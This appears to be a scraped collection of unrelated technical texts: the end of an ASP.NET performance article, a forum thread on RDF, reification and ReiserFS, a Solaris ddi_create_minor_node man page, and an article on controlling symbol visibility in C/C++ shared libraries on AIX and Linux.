Some of the performance test results I talked about in this article truly amazed me when I first saw them. But does that mean you should implement everything I talked about in this article? Nope. Take data binding ASP.NET server controls, for example. Should you ban them from your site from now on? I hope not. I think they are great and serve a good purpose. What you need to do is decide how important a page is to the success of your site. With many sites, 90% of the pages requested are only 10% of the pages the site actually contains. Parsing your IIS logs is a good way to see how often each page is called, and in turn, to decide how vital that page is to your site's success. Performance tuning your code usually comes at the cost of increased complexity and loss of maintainability. You should weigh the benefits of any possible performance change to each page. In the project I was just talking about, we decided to drop ASP.NET controls and rewrite only the 8 most requested pages, but left the other 80+ pages the way they were, using data bound controls.
The secret to developing a site that screams is to get yourself a good set of performance analysis tools and really learn how to use them. Profile and analyze what your code is doing, and adjust accordingly. Use Anakrino and dig into the code of the classes you are using, and learn what is really going on in the background. Try prototyping several different ways to do any given functionality and see which one works the fastest. You’ll write more efficient code and gain a deeper understanding of .NET along the way.
This article has no explicit license attached to it but may contain usage terms in the article text or the download files themselves. If in doubt please contact the author via the discussion board below.
Eureka, the perfect RDF introduction with thanks to A.M. Kuchling (amk). Nothing beats crayon-colored diagrams. It is short, sweet, and hits the main points precisely, including 'political' issues at the end. Much W3C advocacy makes the Semantic Web sound too futuristic....The RDF Core spec is hard to read and really boring....Introductory tutorials are few....Simple things can be done without much effort, and can still be useful.
On one island are the semantic web folks. On another island are semantic filesystem folks. A summit seems in order. I don't hear much about the two working together, but then I live on yet another island. RDF+ReiserFS looks like a match made in heaven, for example, Reiser4 uses dancing trees, which obsolete the balanced tree algorithms used in databases...Do you want a million files in a directory, and want to create them fast? No problem.
From the article,
Reiser has "substantial plans" for adding new kinds of semantics to ReiserFS to help it challenge Microsoft's efforts. "We're planning on competing with the Longhorn filesystem," he says.
The new ReiserFS will eschew the relational algebra approach and work with semistructured data. "The person entering data can employ [the] structure inherent in the data rather than forcing a structure," Reiser said, adding, "Flexibility in querying and creating data is our target. [This] will stand in contrast to Microsoft's SQL-based approach, which does not have that flexibility."
I'm not sure what semistructured data is supposed to mean. RDF triples are structured data, as far as I can see. Graphs are structures, aren't they?
[The] structure inherent in the data sounds a bit metaphysical - how is this Philosophick Mercury to be extracted?
Dancing trees sounds intriguing, though.
'semistructured' refers to the fact that RDF data models do not necessarily adhere to a strict schema (unlike, say, the ER model which is structured).
(subject predicate object) is pretty strict! But it's a mini-structure from which larger structures (that happen to be graphs) can be assembled. Reiser's names are also mini-structures: it's not that they're unstructured in any way (which is why I wonder about the semi-), but that the structure of a lot of them put together isn't totally predetermined by the structure of one of them by itself. In a DB schema, the structure of all of the pieces put together is already decided before you put any of the pieces in.
The goal of the current semantic technologies is to enable not merely the creation of semantic information, but also the automated processing of that information.
RDF is not just a notation: it's also a data model (strictly speaking, RDF/XML or N3 or what have you are notations; triples and graphs are the data model). Given that data model, it's possible to do some automated processing of semantic information by algorithmic means: graph traversal, for instance. The data model allows us to say things like, in order to make valid inferences based on these statements, perform these operations on the graph made up by the triples representing the statements.
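For instance, two statements in triple form; the URIs here are made up purely for illustration:

```turtle
# Two triples sharing a node; together they already form a small graph.
<http://example.org/amk>       <http://example.org/vocab#wrote> <http://example.org/rdf-intro> .
<http://example.org/rdf-intro> <http://example.org/vocab#topic> "RDF" .
```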
The semantics of the semantic web, as currently understood and practised, represent a highly constrained subset of the semantics of what we might call ordinary knowledge construction. There are things that I can know and say about the contents of my file system that are fairly difficult to put into RDF triples (I don't know whether there are any things I can know and say about the contents of my file system that it would be impossible to put into RDF triples).
To be more precise, the translation of the kinds of stuff human beings think they know, and the kinds of meanings they like to bandy about, into machine-processable semantic information generally entails a degree of (re-)formalization. We have not only to discover [the] structure inherent in the data, but also to derive a representation of that structure that will fit into our data model; and this is true even if the data model is claimed to support semistructured data.
The difficulty is then of the following kind: the process of formalizing semantic information so that it can be processed by an automaton is not itself automatable (or at least not by the same process that the machine will use to process the formalized semantic information; there might be some higher-order process, but the same problem would then apply at the higher level). The person entering data still has a job to do (apart from just typing the stuff in), and it is not necessarily an easier job than the job of the old-fashioned suit-wearing person who performs domain modelling and creates relational database schemas.
The (marketing) promise of the Longhorn FS has been that ordinary users will be able to transfer the things they know about the contents of their file systems into the machine, so that the machine will be able to do a variety of smart things with that information. The creation of better and easier-to-use tools for the (re-)formalization of human knowledge is I think a Good Thing; but there is an unfortunate tendency for such tools to be marketed as if they did the job themselves (or magically altered reality so that the job no longer needed to be done).
I would like to have, and could see myself benefiting from the use of, semantic technology in my file system. Even a few user-definable metadata tags that could be addressed by a straightforward query language would be useful. However, Google's desktop search (which chucks semantics out of the window and does pure syntax-crunching text processing) is currently more useful to me than any existing semantic technology, and I think this is because it places less of an onus on me as the end-user to translate myself into automatonese. Google's search engine just gets on and does what machines are good at doing. Semantic technologies want to be your friend.
Dominic: I believe the term "semistructured data" is used in the sense Reiser uses it in his future vision whitepaper (a great read, BTW). In that document it's used as opposed to traditional tree and relational database models. Reiser's idea is more of a "soup" against which very specific, or very general, queries can be run. In this sense it does apply well to RDF.
Reiser's naming scheme mingles structural information of various kinds with content, so that a name can describe a more or less complex data structure into which its parts are then slotted. It looks pretty neat. I don't think it looks much like RDF, though. You could probably model its primitives using RDF primitives, but they're still different sets of primitives.
The islands are not 100% identical. That wasn't the point. It was that they share similar dreams and should probably talk. Both want data pools built on low-level concept primitives, semantic queries, distributed data pools, and enhanced end-user experience. Neither wants end users to become DBAs, as far as I know. Those tasks are for application programs. The paper mentioned touches on many of Dominic's points, like the Google desktop (text keywords), subsets of human knowledge, and the issue of distributed stores.
While the implementation of Microsoft's attempt to blur the distinction between the filesystem name space and the web namespace is one more of appearance than substance, it is surely the right thing to do for Linux as well in the long run. We should simply make our integration one with substance and utility, rather than integrating mostly the look and feel.
That statement sounds very RDF-semantic-webish to me. RDF is terribly simple and terribly powerful, but RDF market-speak is wrapped up in abstract goo. That is one reason I made the post. RDF needs more "RDF for Dummies" to gain traction out there.
Bridges aside, ReiserFS might be an ideal persistence medium for RDF.
Even RDF isn't fixed in stone right now. There is talk about a fourth element to solve the provenance problem. Talking to ReiserFS folks might be very fruitful, that's all. Certainly these islands should know of each other's existence. That seems not the case right now, but I could be very happily wrong.
That statement sounds very RDF-semantic-webish to me. RDF is terribly simple and terribly powerful, but RDF market-speak is wrapped up in abstract goo.
I'm with you 100%. Too many RDF evangelists and triple-store vendors tout the "flexibility" of RDF like a silver bullet, and play dumb when you try to get them to speak to the hidden tradeoff with respect to manageability. Anyway, it's an interesting problem and really does fill a need, but we live in a world where relational data architects outnumber "ontologists" 10000 to 1, and I've yet to be convinced that it doesn't matter.
Even RDF isn't fixed in stone right now. There is talk about a fourth element to solve the provenance problem.
That's very interesting news to me, as it addresses a very specific issue with RDF that I happen to be up against at the moment. Do you happen to have a pointer to any discussion underway about this? Has a proposal been formalized yet? I'd like to follow up with this...
The fact that RDF as it stands includes a (for some reason not terribly popular) approach to reification of statements, so that they can in turn be the object of statements such as S asserts that P, maybe points to the need for a more general mechanism for indicating provenance. I don't know, though; I would be interested to see the arguments on both sides. There is more than one sort of provenance, or more than one sort of possible relationship between S and P: S has verified that P, for instance, or even S strongly intuits that P...
Yeah, I'm definitely aware of reification and all the performance and manageability issues it entails (no pun intended). And certainly in the most general case a reification standard is absolutely essential.
But in many cases there's a fixed set of statement metadata that we want to be able to store and query in a very efficient way. We want RDF extended to something like:
(subject, property, value, date added, source, version, status)
where status is something like "approved", "pending", "rejected", "obsolete"...
The current answer we're hearing from triple-store vendors is "use reification," but frankly it's a pretty poor answer when you're looking for a production-ready system. If a triplestore is really unable to accommodate something as simple as "date added" without relying on reification in its general form (and inference to boot, since I want to enforce that a statement can only have a single "date added"), I'm afraid it'll never perform.
I'm also afraid that ontology design would become a total nightmare, since I'd have to distinguish those statements that require this audit trail from those that don't. You certainly don't want to require that every "date added" statement have its own "date added" record (infinite regress, anyone?).
On the other hand, if I heard a truly compelling case that an implementation has completely solved the performance problems (time and space complexity) of reification, I could probably be convinced to model it that way. (Assuming I can find a qualified ontology design expert, but that's going back to a different fork in this thread...)
(I suppose maybe this is getting off-topic?)
It sounds as if you want something like:
(statement_id subject property object)
that could then be joined to whatever metadata-about-statements you liked in some other table(s), e.g.:
(statement_id date_added source version status)
(statement_id revision_number revision_date revised_by comments)
The point being that the things you want to know about your triples will tend to be fairly fixed and regular, and RDF + reification is maybe not an ideal way of representing those things; at the same time, I doubt whether you could get every possible user of an RDF store to agree on the same schema for metadata-about-triples. A statement ID field could be used to provide a link between the RDF and relational worlds.
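To make the shape of that split concrete, here is a small sketch using SQLite; the table and column names are illustrative only, not taken from any real triple store:

```python
# Sketch of the proposed split: bare triples keyed by a statement ID,
# joined to a separate, fixed-schema metadata table.
import sqlite3

con = sqlite3.connect(":memory:")
con.executescript("""
    CREATE TABLE triples (
        statement_id INTEGER PRIMARY KEY,
        subject TEXT, property TEXT, object TEXT);
    CREATE TABLE statement_meta (
        statement_id INTEGER REFERENCES triples,
        date_added TEXT, source TEXT, version INTEGER, status TEXT);
""")
con.execute("INSERT INTO triples VALUES (1, 'doc1', 'title', 'Future Vision')")
con.execute("INSERT INTO statement_meta VALUES "
            "(1, '2004-05-19', 'reiser', 1, 'approved')")

# A plain relational join answers "give me the approved statements"
# without any reification at all.
row = con.execute("""
    SELECT t.subject, t.property, t.object, m.status
    FROM triples t JOIN statement_meta m USING (statement_id)
    WHERE m.status = 'approved'
""").fetchone()
print(row)  # ('doc1', 'title', 'Future Vision', 'approved')
```

The statement ID column is the only bridge needed between the RDF side and whatever relational metadata tables a given deployment wants.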
I also think many people who have problems with reification as a solution fail to take into account that it is a conceptual mechanism, not necessarily an implementation mechanism.
What I mean is that most triple stores have support for context. This is typically implemented using a quad structure for rdf statements, where the fourth place encodes a grouping identifier. This grouping identifier in many systems is a provenance identifier (the source of the data), but it could equally well be agnostically implemented, that is: no semantics. Then such a grouping mechanism can be used to support date stamps, provenance, versions, etc. To the outside, the store could represent this information as reified RDF, but internally it could store it a lot more efficiently than just adding seven additional statements for each reification (which obviously does not scale too well).
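As a toy illustration of that idea (a pure sketch, not any vendor's API), the fourth field can be an opaque context identifier that carries the per-statement metadata internally, instead of materializing seven reified triples per statement:

```python
# Toy quad store: statements carry an opaque context id; metadata hangs
# off the context rather than off reified statements. All names here are
# hypothetical.
class QuadStore:
    def __init__(self):
        self.quads = []         # (subject, predicate, object, context)
        self.context_meta = {}  # context id -> metadata dict

    def add(self, s, p, o, ctx, **meta):
        self.quads.append((s, p, o, ctx))
        self.context_meta.setdefault(ctx, {}).update(meta)

    def triples(self, ctx=None):
        # Project quads back down to plain RDF triples, optionally
        # restricted to one context (provenance, version, ...).
        return [(s, p, o) for (s, p, o, c) in self.quads
                if ctx is None or c == ctx]

store = QuadStore()
store.add("doc1", "title", "Future Vision", "src:whitepaper",
          date_added="2004-05-19", status="approved")
store.add("doc1", "author", "hans", "src:whitepaper")
print(store.triples("src:whitepaper"))
print(store.context_meta["src:whitepaper"])
```

Externally, the store could still render this context metadata as reified RDF when exchanging data with other systems.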
Thanks to everyone in this thread. I've got some digesting to do... My problem may be as simple as not talking to the right vendors... I'm still a bit reluctant to do this the "pure RDF" way, and Dominic really hit the nail on the head with his proposed RDF->relational join schema. That, to my mind, is the simplest, most elegant solution, and is basically what I'm looking for. We'd also like the storage layer to be aware of the metadata for the purposes of querying, etc., but it may be OK to build that as a separate layer, given the ability to do very efficient joins.
Anyway, thanks for all the food for thought.
...that it might relate closely to what we call today file permissions and ownership. That linkage argues even more for discussions with ReiserFS people.
Come to that, there might be linkages to the Mozart Oz worldview and its various security issues (message passing stored procs).
Wish I could help more, but maybe experts will speak. I invited Reiser himself. His work is truly fantastic and LtU folks should know about it, regardless.
Still more strangeness about the isolation of these islands is that DARPA funds both!
Just to respond to Matt & Dominic's points, RDF *is* a relational world, just that everything's expressed as binary relations. Imagine every predicate (property) as a separate table in a RDBMS with a column for subject and a column for object. There are various ways of representing n-ary (multi-column) relationships in triples with or without reification, there's even a best practices doc on it.
But generally I don't think it's likely to be a big problem in practice. Most datastore implementations include something that makes tracking provenance easy (the named graph approach seems to me the most straightforward). You might need reification when passing data between systems, but when storing and processing the data there's nothing to stop you going outside the RDF model locally.
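The predicate-as-table view can be sketched in a few lines (hypothetical data, just to show the shape):

```python
# Each RDF predicate becomes its own two-column (subject, object) relation.
triples = [
    ("doc1", "title", "Future Vision"),
    ("doc1", "author", "hans"),
    ("doc2", "author", "hans"),
]

tables = {}  # predicate -> rows of (subject, object)
for s, p, o in triples:
    tables.setdefault(p, []).append((s, o))

print(sorted(tables))    # ['author', 'title']
print(tables["author"])  # [('doc1', 'hans'), ('doc2', 'hans')]
```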
Binary Relations were discussed on LtU, and Dominic brought up their relationship with RDF...
Is this summit a physical world event?
My phone is +1 510 482-2483.
Hans Reiser
Architect
ReiserFS
Namesys.com
...that the two groups should communicate, since their goals are similar. The RDF people do have conventions, surely. (Try Google, I'm not the one to ask.) I think you would make a fantastic invited speaker at such an event. Thanks for your wonderful work, by the way!
...ZigZag? There seem to be parallels. (I'm not claiming exact match, just similar intent, as with ReiserFS.) Manu Simoni comments that
Technically, ZigZag is a database and visualization/user-interface system for a subset of general graphs - the restriction is that a node may have only one incoming and one outgoing edge with a given edge label. So structures are organized as lists/strings of nodes, which makes it easier to visualize than general graphs, that can have any number of edges with a given label incoming/outgoing on a node.
The ZigZag-for-personal-computing vision, as I understand it, is to represent all information using interconnected graph structures, and to offer different visualizers and mini-applications that know how to display or manipulate different structures (as opposed to today's unconnected files and black-box applications). So where today's OSes offer folders and files as structure, a ZigZag system offers a much more fine grained structure.
I wonder where exactly it is that I'm living... I have just finished my MSc thesis on an AOP framework that aims at representing an application and its different perspectives with RDF/OWL. The so-called weaver should hopefully become smarter (the way a web agent would in the SW world).
#include <sys/stat.h>
#include <sys/sunddi.h>

int ddi_create_minor_node(dev_info_t *dip, char *name, int spec_type,
     minor_t minor_num, char *node_type, int flag);
Solaris DDI specific (Solaris DDI).
A pointer to the device's dev_info structure.
The name of this particular minor device.
S_IFCHR or S_IFBLK for character or block minor devices respectively.
The minor number for this particular minor device.
Any string literal that uniquely identifies the type of node. The following predefined node types are provided with this release:
For serial ports
For on board serial ports
For dial out ports
For on board dial out ports
For hard disks
For hard disks with channel or target numbers
For CDROM drives
For CDROM drives with channel or target numbers
For tape drives
For DLPI style 1 or style 2 network devices
For display devices
For pseudo devices
If the device is a clone device then this flag is set to CLONE_DEV else it is set to 0.
ddi_create_minor_node() provides the necessary information to enable the system to create the /dev and /devices hierarchies. The name is used to create the minor name of the block or character special file under the /devices hierarchy. At-sign (@), slash (/), and space are not allowed. The spec_type specifies whether this is a block or character device. The minor_num is the minor number for the device. The node_type is used to create the names in the /dev hierarchy that refer to the names in the /devices hierarchy. See disks(1M), ports(1M), tapes(1M), devlinks(1M). Finally, flag determines whether this is a clone device and what device class the node belongs to.
ddi_create_minor_node() returns:
Was able to allocate memory, create the minor data structure, and place it into the linked list of minor devices for this driver.
Minor node creation failed.
The ddi_create_minor_node() function can be called from user context. It is typically called from attach(9E) or ioctl(9E).
The following example creates a data structure describing a minor device called foo which has a minor number of 0. It is of type DDI_NT_BLOCK (a block device) and it is not a clone device.
ddi_create_minor_node(dip, "foo", S_IFBLK, 0, DDI_NT_BLOCK, 0);
add_drv(1M), devlinks(1M), disks(1M), drvconfig(1M), ports(1M), tapes(1M), attach(9E), ddi_remove_minor_node(9F)
Writing Device Drivers for Oracle Solaris 11.2
If the driver is for a network device (node_type DDI_NT_NET), note that the driver name will undergo the driver name constraints identified in the NOTES section of dlpi (7P). Additionally, the minor name must match the driver name for a DLPI style 2 provider. If the driver is a DLPI style 1 provider, the minor name must also match the driver name with the exception that the ppa is appended to the minor name.
Non-gld(7D)-based DLPI network streams drivers are encouraged to switch to gld (7D). Failing this, a driver that creates DLPI style-2 minor nodes must specify CLONE_DEV for its style-2 ddi_create_minor_node() nodes and use qassociate(9F). A driver that supports both style-1 and style-2 minor nodes should return DDI_FAILURE for DDI_INFO_DEVT2INSTANCE and DDI_INFO_DEVT2DEVINFO getinfo(9E) calls to style-2 minor nodes. (The correct association is already established by qassociate(9F)). A driver that only supports style-2 minor nodes can use ddi_no_info(9F) for its getinfo(9E) implementation. For drivers that do not follow these rules, the results of a modunload(1M) of the driver or a cfgadm(1M) remove of hardware controlled by the driver are undefined.
Drivers must remove references to GLOBAL_DEV, NODEBOUND_DEV, NODESPECIFIC_DEV, and ENUMERATED_DEV to compile under Solaris 10 and later versions. | http://docs.oracle.com/cd/E36784_01/html/E36886/ddi-create-minor-node-9f.html | CC-MAIN-2016-22 | refinedweb | 600 | 54.22 |
On Wed, 19 May 2004 16:00:43 -0400 Jim Fulton <[EMAIL PROTECTED]> wrote:
Advertising
I've posted two proposals:
I have to say I am not fond of "*",
I'm not attached to '*'. Feel free to suggest alternatives (other than ':', '/', '|', or '?'). Is that all ;)
> but using the parenthesis to "cast"
the variable seems fairly natural and isn't colored by completelt different meaning in other languages.
So the example: tal:content="x/y*foo.bar.baz/z"
would be: tal:content="x/(foo.bar.baz)y/z"
Yup
Which seems reasonable. The dotted notation seems OK, but it implies that this notation is recognized in general in path expressions, which is confusing because it isn't. If we didn't use dots then it might look like: tal:content="x/(modules/foo/bar/baz)y/z"
I'm not sure what you mean here. If the thing in the parens was a path expression, it would be:
x/(modules/foo.bar/baz)y/z
IOW, modules accepts dotted names.
If the thing in the parenthesis is just another path expression, that mitigates the need for namespaces IMO. The above could then become:

tal:define="baz modules/foo/bar/baz"
tal:content="x/(baz)y/z"
True, but then, the obvious syntax would be:
x/baz(y)/z
which is the top of a slippery slope. :)
It would also make it harder to provide predefined adapter names.
We'd like to be able to define some adapters (e.g. 'zope', 'format', etc.) in ZCML and let people just use them in ZPT without having to use defines.
Jim
-- Jim Fulton mailto:[EMAIL PROTECTED] Python Powered! CTO (540) 361-1714 Zope Corporation
_______________________________________________
Zope-Dev maillist - [EMAIL PROTECTED]
** No cross posts or HTML encoding! **
I'm new to Dart and just learning the basics.
The Dart-Homepage shows following:
It turns out that Dart does indeed have a way to ask if an optional parameter was provided when the method was called. Just use the question mark parameter syntax.
Here is an example:
void alignDingleArm(num axis, [num rotations]) {
  if (?rotations) {
    // the parameter was really used
  }
}
So I've wrote a simple testing script for learning:
import 'dart:html';

void main() {
  String showLine(String string, {String printBefore : "Line: ", String printAfter}) {
    // check, if parameter was set manually:
    if (?printBefore) {
      // check, if parameter was set to null
      if (printBefore == null) {
        printBefore = "";
      }
    }
    String line = printBefore + string + printAfter;
    output.appendText(line);
    output.appendHtml("<br />\n");
    return line;
  }

  showLine("Hallo Welt!", printBefore: null);
}
The Dart-Editor already marks the questionmark as Error:
Multiple markers at this line
- Unexpected token '?'
- Conditions must have a static type of 'bool'
When running the script in Dartium, the JS-Console shows folloing Error:
Internal error: '': error: line 7 pos 8: unexpected token '?'
if(?printBefore){
   ^
I know that it would be enough to check whether printBefore is null, but I want to learn the language.

Does anyone know the reason for this problem? How can I check whether the parameter was set manually?
URL Rewriting
If your browser does not support cookies, URL rewriting provides you with another session tracking alternative. URL rewriting is a method in which the requested URL is modified to include a session ID. There are several ways to perform URL rewriting. You are going to look at one method that is provided by the Servlet API. Listing 5.3 shows an example of URL rewriting.
Listing 5.3 URLRewritingServlet.java
import javax.servlet.*;
import javax.servlet.http.*;
import java.io.*;
import java.util.*;

public class URLRewritingServlet extends HttpServlet {

  // Initialize global variables
  public void init(ServletConfig config) throws ServletException {
    super.init(config);
  }

  // Process the HTTP GET request
  public void doGet(HttpServletRequest request, HttpServletResponse response)
      throws ServletException, IOException {

    response.setContentType("text/html");
    PrintWriter out = response.getWriter();
    out.println("<html>");
    out.println("<head><title>URL Rewriting</title></head>");
    out.println("<body>");

    // Encode a URL string with the session id appended to it.
    String url = response.encodeRedirectURL("");

    // Redirect the client to the new URL
    response.sendRedirect(url);

    out.println("</body></html>");
    out.close();
  }

  // Get Servlet information
  public String getServletInfo() {
    return "URLRewritingServlet Information";
  }
}
This servlet services a GET request and redirects the client to a new URL. This new URL has the string sid=5748 appended to it. This string represents a session ID. When the servlet that services the redirection receives the request, it will be able to determine the current user based on the appended value. At that point, the servlet can perform a database lookup on the user and her actions based on this ID.
Two methods are involved in this redirection. The first is HttpServletResponse.encodeRedirectURL(), which takes a String that represents a redirection URL and encodes it for use in the second method. The second method used is the HttpServletRequest.sendRedirect() method. It takes the String returned from the encodeRedirectString() and sends it back to the client for redirection.
The advantage of URL rewriting over hidden form fields is the capability to include session tracking information without the use of forms. Even with this advantage, it is still a very arduous coding process. | http://www.informit.com/articles/article.aspx?p=131027&seqNum=5 | CC-MAIN-2019-04 | refinedweb | 345 | 50.43 |
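The string manipulation behind URL rewriting is itself simple. The following stand-alone helper is hypothetical (it is not part of the Servlet API, whose encodeRedirectURL() additionally decides whether rewriting is needed at all, e.g., when the client accepts cookies), but it shows the mechanics:

```java
// Hypothetical helper illustrating the string manipulation behind
// URL rewriting: append a session id, starting a query string with '?'
// or extending an existing one with '&'.
public class UrlRewrite {

    static String appendSessionId(String url, String sid) {
        String separator = url.contains("?") ? "&" : "?";
        return url + separator + "sid=" + sid;
    }

    public static void main(String[] args) {
        System.out.println(appendSessionId("http://example.com/servlet/checkout", "5748"));
        System.out.println(appendSessionId("http://example.com/servlet/list?page=2", "5748"));
    }
}
```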
What is symbol and symbol visibility
Symbol is one of the basic terms when talking about object files, linking, and so on. In fact, in C/C++, a symbol is the entity corresponding to most user-defined variables and function names, possibly mangled with namespace and class/struct names. For example, a C/C++ compiler may generate symbols in an object file when people define non-static global variables or non-static functions, which are useful for the linker to decide whether different modules (object files, dynamic shared libraries, executables) should share the same data or code.
Though both variables and functions may be shared among modules, variable sharing is more common among object files. For example, a programmer may declare a variable in a.c:
extern int shared_var;
And, define it in b.c:
int shared_var;
Thus, the symbol shared_var appears in both compiled objects a.o and b.o, and the symbol in a.o may finally share the address in b.o after the linker's resolution. However, it is rare that people make variables shared among shared libraries and executables. For such modules, it is very common to make only functions visible to the others. Sometimes we call such functions the API, as the module is deemed to provide such interfaces for others to call into. We also say such symbols are exported, since they are visible to the others. Notice that such visibility only takes effect at dynamic linking time, since shared libraries are commonly loaded as part of the memory image when the program runs. Therefore, symbol visibility becomes an attribute of all global symbols for dynamic linking.
Why we need to control symbol visibility
On different platforms, the XL C/C++ compiler might choose either to export all the symbols in a module or none of them. For example, when creating Executable and Linking Format (ELF) shared libraries on the IBM PowerLinux™ platform, by default all the symbols are exported. When creating an XCOFF library on AIX running on the POWER platform, the current XL C/C++ compiler may choose not to export any symbol without the assistance of a tool. There are also other ways that allow a programmer to determine symbol visibility symbol by symbol. (That is what we will introduce in the next part of this series.) However, it is generally not recommended to export all the symbols in a module. Programmers can export just the symbols that are needed. This not only benefits library security, but also shortens dynamic linking time.
When programmers choose to export all symbols, there is a high risk of symbol collisions at linking time, especially when modules are developed by different programmers. Because a symbol is a low-level concept, it carries no notion of scope. As soon as you link against a library that contains symbols with the same names as yours, that library might accidentally override your own symbols once the linker's resolution is done (hopefully with some warning or error reported). And, in most cases, such symbols were never meant to be used, from the library designer's perspective. Therefore, exporting only a limited, carefully chosen set of meaningful symbols can help a lot with such issues.
For C++ programming, there is nowadays a growing demand for performance. However, due to dependencies on other libraries and the use of specific C++ features such as templates, the compiler and linker tend to use and generate a huge number of symbols. Therefore, exporting all symbols slows down the program and consumes massive amounts of memory. Exporting a limited number of symbols reduces the loading and linking time for dynamic shared libraries. Furthermore, it also enables optimization from the compiler's perspective, which means more efficient code can be generated.
The above drawbacks of exporting all symbols explain why defining symbol visibility is mandatory. In this article, we provide solutions to make symbols in the dynamic shared object (DSO) be under control. Users can identify different ways to solve the same problem, and we also propose which one should be preferred on a specific platform.
Ways to control symbol visibility
In the discussions below, we will make use of the following C++ code snippet:
Listing 1. a.C
int myintvar = 5;

int func0 () {
  return ++myintvar;
}

int func1 (int i) {
  return func0() * i;
}
In a.C, we define one variable myintvar, and two functions func0 and func1. By default, when creating a shared library on the AIX platform, the compiler and linker, along with the CreateExportList tool, make all three symbols visible. We can check this in the Loader Symbol Table Information with the dump binary tool:

$ xlC -qpic a.C -qmkshrobj -o libtest.a
$ dump -Tv libtest.a

                        ***Loader Symbol Table Information***
[Index]      Value      Scn     IMEX Sclass   Type           IMPid Name

[0]     0x20000280    .data      EXP     RW SECdef        [noIMid] myintvar
[1]     0x20000284    .data      EXP     DS SECdef        [noIMid] func0__Fv
[2]     0x20000290    .data      EXP     DS SECdef        [noIMid] func1__Fi
Here, "EXP" means the symbol is "exported". The function names func0 and func1 are mangled according to the C++ mangling rules (however, they are not hard to guess). The -T option of the dump tool shows the Loader Symbol Table Information, which is used by the dynamic linker. In this case, all the symbols in a.C are exported. But from the perspective of a library writer, we may want to export only func1. The global symbol myintvar and the function func0 are deemed to hold internal state only — that is, they are used only locally. Thus, making them invisible is important for the library writer.
We have at least three ways to achieve this goal. These include: using the static keyword, defining the GNU visibility attribute, and using an export list. Each of them has unique functionality and (maybe) drawbacks as well. We shall look into them now.
1. Using the static keyword
The static keyword in C/C++ may be an overloaded keyword as it can specify both the scope and the storage for the variable. For scope, we may say that it disables the external linkage for the symbol in file. That means that the symbol with the keyword, static would never be linkable as the compiler does not leave any information for the linker about this symbol. It is a language-level control and it is the simplest way to hide the symbol.
Let us add the static keyword to the above case:
Listing 2. b.C
static int myintvar = 5;

static int func0 () {
  return ++myintvar;
}

int func1 (int i) {
  return func0() * i;
}
When we generate the shared library and look in to the Loader Symbol Table Information again, it works as expected:
$ xlC -qpic a.C -qmkshrobj -o libtest.a
$ dump -Tv libtest.a

                        ***Loader Symbol Table Information***
[Index]      Value      Scn     IMEX Sclass   Type           IMPid Name

[0]     0x20000284    .data      EXP     DS SECdef        [noIMid] func1__Fi
Now, only func1 is exported, as the information shows. However, though the static keyword can hide a symbol, it also imposes an extra rule: the variable or function can only be used within the file where it is defined. Thus, if we declare:

extern int myintvar;

in file b.C, and later want to build libtest.a from both a.o and b.o, the linker will display an error message stating that myintvar declared in b.C cannot be linked, because the linker did not find a definition elsewhere. That breaks data/code sharing inside the same module, which a programmer would generally require. Thus, static is better used as a visibility control for variables/functions inside a file, rather than as a visibility control for low-level symbols. In fact, most people would not rely on the static keyword to control symbol visibility. Therefore, we consider the second method:
2. Defining the visibility attribute (GNU only)
The next candidate to control symbol visibility is to use the visibility attribute. The ELF application binary interface (ABI) defines the visibility of symbols. Generally, it defines four classes, but in most cases, only two of them are more commonly used:
- STV_DEFAULT: Symbols defined with it will be exported. In other words, it declares that symbols are visible everywhere.
- STV_HIDDEN: Symbols defined with it will not be exported and cannot be used from other objects.
Notice that this is an extension for GNU C/C++ only. Thus currently, PowerLinux customers can use it as GNU attribute for symbols. Here is an example for our case:
int myintvar __attribute__ ((visibility ("hidden")));

int __attribute__ ((visibility ("hidden"))) func0 () {
  return ++myintvar;
}
...
To define a GNU attribute, you need to include __attribute__ and the parenthesized (double parenthesis) content. You can specify the visibility of symbols as visibility("hidden"). In the above case, we mark myintvar and func0 as having hidden visibility. This does not allow them to be exported from the library, but they can still be shared among source files. In fact, hidden symbols do not appear in the dynamic symbol table, but are left in the symbol table for static linking purposes. That is a well-defined behavior and can definitely achieve our goal. It obviously surpasses the static keyword solution.
Notice that, for a variable specified with the visibility attribute, also declaring it as static might confuse the compiler. As a result, the compiler would display a warning message.
The ELF ABI also defines other visibility modes:
- STV_PROTECTED: The symbol is visible outside the current executable or shared object, but it may not be overridden. In other words, if a protected symbol in a shared library is referenced by an other code in the shared library, the other code will always reference the symbol in the shared library, even if the executable defines a symbol with the same name.
- STV_INTERNAL: The symbol is not accessible outside the current executable or shared library.
Notice that currently, this method is not yet supported by the XL C/C++ compiler, even on the PowerLinux platform. But still, we have another way out.
3. Using the export list
The above two solutions can take effect at the source-code level and only require the compiler to make the functionality achieved. However, it is essential for users to have the ability to tell the linker to perform similar work as symbol visibility gets involved mainly in dynamic linking. The solution for the linker is the export list.
The export list would be generated by the compiler (or related tools, such as CreateExportlist) automatically at the time of creating the shared library. It can also be written by the developer manually. An export list is passed into and treated as input for the linker by the linker option. However, as the compiler driver would do all trivial work, the programmer seldom takes much care of very detailed options.
The idea of the export list is to explicitly instruct the linker about the symbols that can be exported from the object files through an external file. GNU people named such an external file as “export map”. We can write an export map for our case:
{
  global: func1;
  local: *;
};
The above description tells the linker that only the func1 symbol is to be exported, and that all other symbols (matched by *) are local. The programmer can also explicitly list func0 or myintvar as local symbols (local: func0; myintvar;), but obviously the catch-all (*) is more convenient. Generally speaking, using the catch-all (*) to mark all symbols as local and picking out only the ones that need to be exported is highly recommended because it is safer: it avoids users forgetting to keep some symbols local, and also avoids duplication in both lists, which may cause unexpected behavior.
To generate a DSO with this method, the programmer has to pass the export map file with the --version-script linker option:
$ gcc -shared -o libtest.so a.C -fPIC -Wl,--version-script=exportmap
Reading the ELF object file with the readelf binary utility together with the -s option:

readelf -s libtest.so

would show that only func1 is globally visible for this module (entries in the .dynsym section); the other symbols are hidden as local.
For the IBM AIX OS linker, a similar export list is provided. To be exact, the export list is called the export file on AIX.
Writing an export file is simple. The programmer just needs to put the symbols that are needed to be exported into the export file. In our case, it is just as simple as shown below:
func1__Fi // symbol name
Thus, when we specify the export file with a linker option, the only symbol we want to export is added into the “loader symbol table” for XCOFF, while the others are kept as un-exported.
And for AIX 6.1 and later versions, the programmer may even append a visibility attribute to describe the visibility of symbols in the export file. The AIX linker now accepts four such visibility attribute types:
- export: Symbol is exported with the global export attribute.
- hidden: Symbol is not exported.
- protected: Symbol is exported but cannot be rebound (preempted), even if runtime linking is being used.
- internal: Symbol is not exported. The address of the symbol must not be provided to other programs or shared objects, but the linker does not verify this.
